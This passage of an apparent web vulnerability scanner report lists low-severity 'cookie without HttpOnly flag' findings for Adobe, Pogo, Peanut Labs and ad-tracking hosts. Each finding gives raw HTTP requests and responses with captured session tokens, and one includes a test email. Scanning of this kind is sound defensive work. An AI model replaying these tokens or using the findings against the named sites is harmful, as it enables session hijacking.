Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
Date: Sun, 09 Jan 2011 02:58:24 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://www.adbrite.com/
Pragma: no-cache
Server: Apache
Set-Cookie: ADBRITE_SESS_1=20vl1tpukh23pji2agsn60lh44; expires=Mon, 17 Jan 2011 02:58:24 GMT; path=/; domain=www.adbrite.com
Set-Cookie: AB_ORIGIN=0; expires=Mon, 10-Jan-2011 02:58:24 GMT; path=/
Content-Length: 3
Connection: close

10.7. http://www.adobe.com/cfusion/exchange/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.adobe.com
Path:	/cfusion/exchange/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=7126392;expires=Tue, 01-Jan-2041 05:25:22 GMT;path=/
CFTOKEN=132e3b7190093aee-1C5C204D-EC18-7019-3906CCE757EA8849;expires=Tue, 01-Jan-2041 05:25:22 GMT;path=/
DYLANSESSIONID=48306eaaf197ace953b04592529724475551;path=/
UID=1C5C2077%2D9490%2D3BC1%2D91B37A414A682C30;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:22 GMT;path=/cfusion/
DylanApp-BigIP=223114250.24610.0000; path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cfusion/exchange/ HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.8. http://www.adobe.com/cfusion/marketplace/index.cfm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.adobe.com
Path:	/cfusion/marketplace/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=6727968;expires=Tue, 01-Jan-2041 05:25:32 GMT;path=/
CFTOKEN=b3b6fb7bf15b5dba-1C5DBC63-0270-1BAD-1AB71BB1FC329068;expires=Tue, 01-Jan-2041 05:25:32 GMT;path=/
DYLANSESSIONID=4830cfe6058d4297cda07d4b657e334c4d4b;path=/
UID=1C5DBCC0%2DAF9A%2D535E%2D2CEE49CDABEF82D1;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:32 GMT;path=/cfusion/
DylanApp-BigIP=877425674.24610.0000; path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cfusion/marketplace/index.cfm HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.9. http://www.adobe.com/cfusion/membership/index.cfm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.adobe.com
Path:	/cfusion/membership/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=6659512;expires=Tue, 01-Jan-2041 05:25:08 GMT;path=/
CFTOKEN=f4347a9052ead450-1C5A13B4-FB54-F217-4F00E67240D7B5AD;expires=Tue, 01-Jan-2041 05:25:08 GMT;path=/
DYLANSESSIONID=483093c2ba6274c2472f7e5384a3d1d576f6;path=/
UID=1C5A140F%2DD895%2D113E%2D36E6ED950382D262;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:08 GMT;path=/cfusion/
DylanApp-BigIP=877425674.13345.0000; path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cfusion/membership/index.cfm HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.10. http://www.adobe.com/cfusion/membership/logout.cfm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.adobe.com
Path:	/cfusion/membership/logout.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=7115771;expires=Tue, 01-Jan-2041 05:25:12 GMT;path=/
CFTOKEN=802706847268b08f-1C5A9C66-D18B-0210-A596AFF349468AB8;expires=Tue, 01-Jan-2041 05:25:12 GMT;path=/
DYLANSESSIONID=48301f6e250b10ed162b5e67133466408062;path=/
UID=1C5A9C8D%2DB2A1%2D7B91%2D5082B849805CBB1C;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:12 GMT;path=/cfusion/
DylanApp-BigIP=1179415562.24610.0000; path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cfusion/membership/logout.cfm HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.11. http://www.adobe.com/cfusion/partnerportal/index.cfm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.adobe.com
Path:	/cfusion/partnerportal/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=7115774;expires=Tue, 01-Jan-2041 05:25:20 GMT;path=/
CFTOKEN=bf6594358230f035-1C5BD289-F861-53E7-EF47F0828906ED0C;expires=Tue, 01-Jan-2041 05:25:20 GMT;path=/
DYLANSESSIONID=4830d5f3e3edde0152215310b371d617445b;path=/
UID=1C5BD2B1%2DB643%2D8F26%2D79D72DC963592023;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:20 GMT;path=/cfusion/
DylanApp-BigIP=1179415562.24610.0000; path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cfusion/partnerportal/index.cfm HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.12. http://www.adobe.com/cfusion/showcase/index.cfm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.adobe.com
Path:	/cfusion/showcase/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=7076697;expires=Tue, 01-Jan-2041 05:25:31 GMT;path=/
CFTOKEN=45e90dab0cf2e0f4-1C5FE030-9D22-1E3F-163C220229B483EB;expires=Tue, 01-Jan-2041 05:25:31 GMT;path=/
DYLANSESSIONID=4830fe667c0d6bf4ef251b79727419e6f6a3;path=/
UID=1C5FE0E3%2DBCB0%2DEEB3%2D46E28AA62C358F29;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:31 GMT;path=/cfusion/
DylanApp-BigIP=1095529482.38945.0000; path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cfusion/showcase/index.cfm HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.13. http://www.adobe.com/cfusion/store/html/index.cfm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.adobe.com
Path:	/cfusion/store/html/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=7135066;expires=Tue, 01-Jan-2041 05:25:36 GMT;path=/
CFTOKEN=eca79c32bda4a00c-1C5EDF8A-A024-3155-A1E063E78597F2A8;expires=Tue, 01-Jan-2041 05:25:36 GMT;path=/
DYLANSESSIONID=4830c330b1c2e2e067590474170483e7e535;path=/
UID=1C5EDFD1%2D05E9%2D05EA%2DB2D2E9C8D3280AAA;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:36 GMT;path=/cfusion/
DylanApp-BigIP=172782602.24610.0000; path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cfusion/store/html/index.cfm HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.14. http://www.adobe.com/cfusion/support/index.cfm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.adobe.com
Path:	/cfusion/support/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=7126388;expires=Tue, 01-Jan-2041 05:25:13 GMT;path=/
CFTOKEN=d9b8ca39e6af1b8d-1C5AC309-AFF5-561E-C02FB9A9A70C0A84;expires=Tue, 01-Jan-2041 05:25:13 GMT;path=/
DYLANSESSIONID=483091709039af2c2535f29177f7e63d4c5e;path=/
UID=1C5AC330%2DA7F4%2DF77C%2D6D6B4B0B159D5F71;domain=.adobe.com;expires=Tue, 01-Jan-2041 05:25:13 GMT;path=/cfusion/
DylanApp-BigIP=223114250.24610.0000; path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cfusion/support/index.cfm HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.15. http://www.adobe.com/events/main.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.adobe.com
Path:	/events/main.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=1c1o9aj6r4w3c;path=/
AWID=10.116.66.9.1294550851826;path=/;domain=.adobe.com;expires=Tue, 05-Jan-2021 21:27:31 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /events/main.jsp HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.16. http://www.freshnews.com/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc- previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.freshnews.com
Path:	/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc-

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSdcb5af41d343fdd786908e4442f98f39=dpp7pp1blldcdp337o15850h97; expires=Tue, 01-Feb-2011 08:52:02 GMT; path=/; domain=.freshnews.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.17. http://www.peanutlabs.com/peanutlabs/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.peanutlabs.com
Path:	/peanutlabs/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; expires=Tue, 01 Feb 2011 05:08:39 GMT; path=/; domain=.peanutlabs.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.18. http://www.peanutlabs.com/userGreeting.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.peanutlabs.com
Path:	/userGreeting.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=no34gl7ittr6r2j8nkt40st7q5; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; expires=Mon, 09-Jan-2012 02:32:16 GMT; path=/; domain=.peanutlabs.com
ofuid=12633542; expires=Mon, 09-Jan-2012 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
dob=deleted; expires=Sat, 09-Jan-2010 02:32:15 GMT; path=/; domain=.peanutlabs.com
sex=deleted; expires=Sat, 09-Jan-2010 02:32:15 GMT; path=/; domain=.peanutlabs.com
pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; expires=Mon, 09-Jan-2012 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_lang=en_US; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com
pl_email=test4%40fastdial.net; expires=Tue, 08-Feb-2011 02:32:16 GMT; path=/; domain=.peanutlabs.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.19. http://www.pixeltrack66.com/mt/w2643334g4y223/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.pixeltrack66.com
Path:	/mt/w2643334g4y223/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6; path=/
mt_clk=54267db83a49b89cd0644d669488302a; path=/
mt_lds=54267db83a49b89cd0644d669488302a; expires=Tue, 08-Feb-2011 01:35:14 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mt/w2643334g4y223/ HTTP/1.1
Host: www.pixeltrack66.com
Proxy-Connection: keep-alive
Referer: http://content.yieldmanager.edgesuite.net/atoms/4b/20/4f/fa/4b204ffa9cd07b1ada562ff40d59b324.swf?clickTag=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F2%2C13%253B0cb5d93d88c4bebb%253B12d6864c680%2C0%253B%253B%253B2580633203%2CiQIAAJ2WCQB3lU0AAAAAAHdEFQAAAAAAAgAEAAYAAAAAAP8AAAAHFB5%2DDwAAAAAA660cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABk2wQAAAAAAAIAAgAAAAAAYsZkaC0BAAAAAAAAAGY0MDZhMzIwLTFiOGYtMTFlMC1hYjI1LTAwMWIyNDc4NGFhNABwAAAAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Epogo%2Ecom%252Fgames%252Fscrabble%253Fpagesection%253Dfree%5Fhome%5Fhot%5Fgames1%5Fpl%5Fscrabble%2C
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 09 Jan 2011 01:35:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV"
Set-Cookie: PHPSESSID=vcnvs4i5j3pnkunpsl190rd6p6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mt_clk=54267db83a49b89cd0644d669488302a; path=/
Set-Cookie: mt_lds=54267db83a49b89cd0644d669488302a; expires=Tue, 08-Feb-2011 01:35:14 GMT; path=/
Location: http://www.theiq-quiz.com/hv1iqqz/blender_redirect.php?web_id=CD99&exitpops=9175
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

10.20. http://www.thedailynews.cc/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.thedailynews.cc
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASPSESSIONIDSASAASQB=KCNAOIEADCPKOCPKACDIKMJH; path=/
UID=15824293; expires=Mon, 31-Dec-2012 05:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.thedailynews.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.21. http://ad.doubleclick.net/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/click

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

id=c653243310000d9|2070351/902302/14983|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.22. http://ad.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 01:48:35 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 01:48:35 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 01:48:35 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=3765491407790554839&fpid=10&nu=n&t
...[SNIP]...

10.23. http://altfarm.mediaplex.com/ad/js/55290 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/55290

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

svid=517004695355; expires=Wed, 8-Jan-2014 5:33:36 GMT; path=/; domain=.mediaplex.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.24. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 08-Jan-2013 01:22:52 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.25. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 08-Jan-2013 01:22:56 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.26. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 08-Jan-2013 01:24:25 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.27. http://board-games.pogo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://board-games.pogo.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

prod.JID=9647E635CE26F393097DADDDE17451AE.000192; Domain=.pogo.com; Path=/
com.pogo.unid=6606282471652314; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:17 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?pageSection=footer_board HTTP/1.1
Host: board-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.28. http://board-games.pogo.com/games/monopoly previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://board-games.pogo.com
Path:	/games/monopoly

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

prod.JID=C044D23F948B766D6981FBBCF5BAB72F.000115; Domain=.pogo.com; Path=/
com.pogo.unid=6606372665965638; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:18 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /games/monopoly HTTP/1.1
Host: board-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.29. http://board-games.pogo.com/games/online-chess previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://board-games.pogo.com
Path:	/games/online-chess

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

prod.JID=8156B355ACCAE0414EB6405CFDC5596E.000226; Domain=.pogo.com; Path=/
com.pogo.unid=6606458565311528; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:19 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /games/online-chess HTTP/1.1
Host: board-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.30. http://board-games.pogo.com/games/risk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://board-games.pogo.com
Path:	/games/risk

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

prod.JID=B04A73F82288DFD7D07A20FE079D68B6.000048; Domain=.pogo.com; Path=/
com.pogo.unid=6606286766626273; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:18 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /games/risk HTTP/1.1
Host: board-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.31. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BannerSource.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
A2=gn3Ka4Ki09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
E2=09MYgA92sF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G602g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G602g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
C_7971\=4288750

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.32. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BannerSource.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G602g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G602g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
C_=BlankImage

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; B2=; u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; E2=09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G602g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G602g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 02:06:26 GMT
Connection: close

10.33. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

A2=gn3Ka4JO09MY00008y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
